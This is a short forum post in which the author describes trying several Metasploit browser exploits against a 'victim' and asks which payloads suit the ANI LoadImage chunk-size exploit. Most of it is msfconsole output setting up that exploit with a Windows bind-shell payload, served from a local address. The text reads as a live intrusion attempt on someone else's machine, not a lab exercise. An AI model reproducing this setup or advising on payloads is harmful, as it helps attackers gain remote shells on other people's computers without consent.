ms06_013_createtextrange dosen't work with meterperter and shell bind and the reverse.
i'm getting something from ms06_001_wmf_setabortproc - the victim is receiving my exploit and when he opens it it's an image X. unfortunately this exploit is for ie6 and the victim has ie7 so it's irrelevant.
ani_loadimage_chunksize looks relevant. the target could be:
Code:
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ani_loadimage_chunksize) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.0.0.7 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Use SSL
URIPATH goal.html no The URI to use for this exploit (default is random)
Payload options (windows/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
do you know what payloads are good to use with this exploit?
i'm gonna try it now and i'll post my results.